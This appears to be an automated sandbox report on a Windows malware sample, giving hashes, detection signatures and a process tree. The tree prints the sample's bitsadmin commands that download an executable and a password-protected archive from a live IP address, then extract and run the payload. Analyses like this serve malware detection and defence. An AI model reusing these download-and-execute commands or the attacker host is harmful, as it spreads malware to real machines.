Analysis

  • max time kernel
    144s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 03:48

General

  • Target

    a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe

  • Size

    42KB

  • MD5

    56944be08ed3307c498123514956095b

  • SHA1

    53ffb50051da62f2c2cee97fe048a1441e95a812

  • SHA256

    a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181

  • SHA512

    aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13

  • SSDEEP

    768:hef6qfEqLBTxrLkSRoys2uGUmRDcMznWHWmZCXrs0D3S9i1GcucbMgAoG:efHLrLkSRoybCQUZsrs0DC1cucbMDoG

Score
8/10

Malware Config

Signatures

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
    "C:\Users\Admin\AppData\Local\Temp\a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2756
    • C:\Windows\SysWOW64\ping.exe
      ping -n 1 8.8.8.8
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2712
    • C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:2844
    • C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:376
    • C:\Users\Admin\AppData\Local\Temp\UnRAR.exe
      "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe" x -o+ -pQwerty1234.Q "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp"
      2⤵
        PID:2784
      • C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
        "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2320
        • C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
          "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2008
      • C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
        "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1712
        • C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
          "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1032

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\_MEI23202\python39.dll

      Filesize

      4.2MB

      MD5

      b28171046f2d50c645b076b6ebac220e

      SHA1

      4fb1ca03eb372592e0b20d5e7aceedb501bbb64c

      SHA256

      6366bcf2e53e6f3dc588779b3b7401b7ad955759c03d722221595e26a8d8f347

      SHA512

      7b9cd051ec42e23110020ed75281eec7854ad7f885c150377885663bee2a0e5b1eece6d7a54837b60e622fa8f56c2d1dbcb62bc8c086c017d9831db8717cd0c5

    • \Users\Admin\AppData\Local\Temp\nst4442.tmp\nsExec.dll

      Filesize

      7KB

      MD5

      11092c1d3fbb449a60695c44f9f3d183

      SHA1

      b89d614755f2e943df4d510d87a7fc1a3bcf5a33

      SHA256

      2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

      SHA512

      c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a